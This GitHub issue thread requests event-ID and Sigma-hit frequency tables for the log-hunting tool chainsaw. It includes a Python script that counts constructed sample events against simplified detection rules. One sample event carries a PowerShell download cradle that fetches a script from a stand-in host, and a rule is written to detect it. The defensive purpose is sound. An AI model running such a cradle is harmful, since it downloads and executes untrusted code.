
Feature Request: Event Log ID / Sigma Summary

Open ssnkhan opened this issue 1 year ago • 1 comments

Would be helpful if chainsaw could provide high level stats detailing the frequency of event code IDs observed in an Event Log, like Eric Zimmerman's evtxecmd tool. Potential usage would be chainsaw hunt --stats-only evtx_attack_samples.

Event ID        Count
300             1
400             666
403             404
600             4,939
800             197

Another option --stats-only-sigma would produce a similar frequency table, but with a count of Sigma hits.

Thanks for this amazing tool!

ssnkhan avatar Jan 10 '24 10:01 ssnkhan
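The two tables the request describes (event ID frequency, and the same table counted by Sigma hits) are simple enough to sketch outside the tool. The script below is an added example, not chainsaw's code and not from this thread. It assumes records have already been parsed into flat dicts keyed by EVTX field names (EventID, Channel, EventData fields); the sample events and the cut-down Sigma-style rules are constructed for the demo, and only a `selection` map with the `|contains` modifier is supported, not full Sigma logic.

```python
from collections import Counter

# Constructed sample records (not real log data). Assumption: each event is a
# flat dict of EVTX fields; a real feed would come from an EVTX parser such as
# chainsaw's JSON dump or python-evtx.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Channel": "Security", "LogonType": 10, "TargetUserName": "alice"},
    {"EventID": 4624, "Channel": "Security", "LogonType": 2, "TargetUserName": "bob"},
    {"EventID": 4625, "Channel": "Security", "LogonType": 3, "TargetUserName": "admin"},
    {"EventID": 4625, "Channel": "Security", "LogonType": 3, "TargetUserName": "admin"},
    {"EventID": 4625, "Channel": "Security", "LogonType": 3, "TargetUserName": "admin"},
    {"EventID": 4104, "Channel": "Microsoft-Windows-PowerShell/Operational",
     "ScriptBlockText": "(New-Object Net.WebClient).DownloadString('http://example.test/x.ps1')"},
    {"EventID": 4104, "Channel": "Microsoft-Windows-PowerShell/Operational",
     "ScriptBlockText": "Get-ChildItem C:\\Temp"},
    {"EventID": 7045, "Channel": "System", "ServiceName": "svc", "ImagePath": "C:\\Windows\\Temp\\a.exe"},
]

# Constructed, heavily simplified Sigma-style rules (assumption: only a single
# 'selection' map is evaluated, with plain equality or the '|contains' modifier).
SAMPLE_RULES = [
    {"title": "Failed network logon", "selection": {"EventID": 4625, "LogonType": 3}},
    {"title": "PowerShell download cradle",
     "selection": {"EventID": 4104, "ScriptBlockText|contains": "DownloadString"}},
    {"title": "Service installed from Temp",
     "selection": {"EventID": 7045, "ImagePath|contains": "\\Temp\\"}},
]


def _matches(event, selection):
    """True if every field in the selection map matches the event."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        actual = event.get(field)
        if actual is None:
            return False
        if modifier == "contains":
            if str(expected).lower() not in str(actual).lower():
                return False
        elif modifier == "":
            if actual != expected:
                return False
        else:
            raise ValueError(f"unsupported Sigma modifier: {modifier}")
    return True


def event_id_counts(events):
    """Frequency of each event ID, i.e. the --stats-only table."""
    return Counter(e["EventID"] for e in events)


def sigma_hit_counts(events, rules):
    """Per event ID, number of (event, rule) pairs that matched: the --stats-only-sigma table."""
    hits = Counter()
    for event in events:
        for rule in rules:
            if _matches(event, rule["selection"]):
                hits[event["EventID"]] += 1
    return hits


def format_table(counts, header="Event ID"):
    """Render a two-column table with thousands separators, sorted by event ID."""
    lines = [f"{header:<16}Count"]
    for event_id, count in sorted(counts.items()):
        lines.append(f"{event_id:<16}{count:,}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_table(event_id_counts(SAMPLE_EVENTS)))
    print()
    print(format_table(sigma_hit_counts(SAMPLE_EVENTS, SAMPLE_RULES)))
```

Counting (event, rule) pairs rather than distinct events means an event hit by two rules contributes two to its ID's Sigma count; if the tool's table should instead count events with at least one hit, the inner loop would stop at the first match.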

I am creating a tool to plot this output. I was already planning on implementing this stats idea; I don't know if this helps anyone or not.

image

It also plots AWS logs and you can see how the stats output is looking for that.

https://github.com/dbissell6/Thundaga

dbissell6 avatar Jan 10 '24 23:01 dbissell6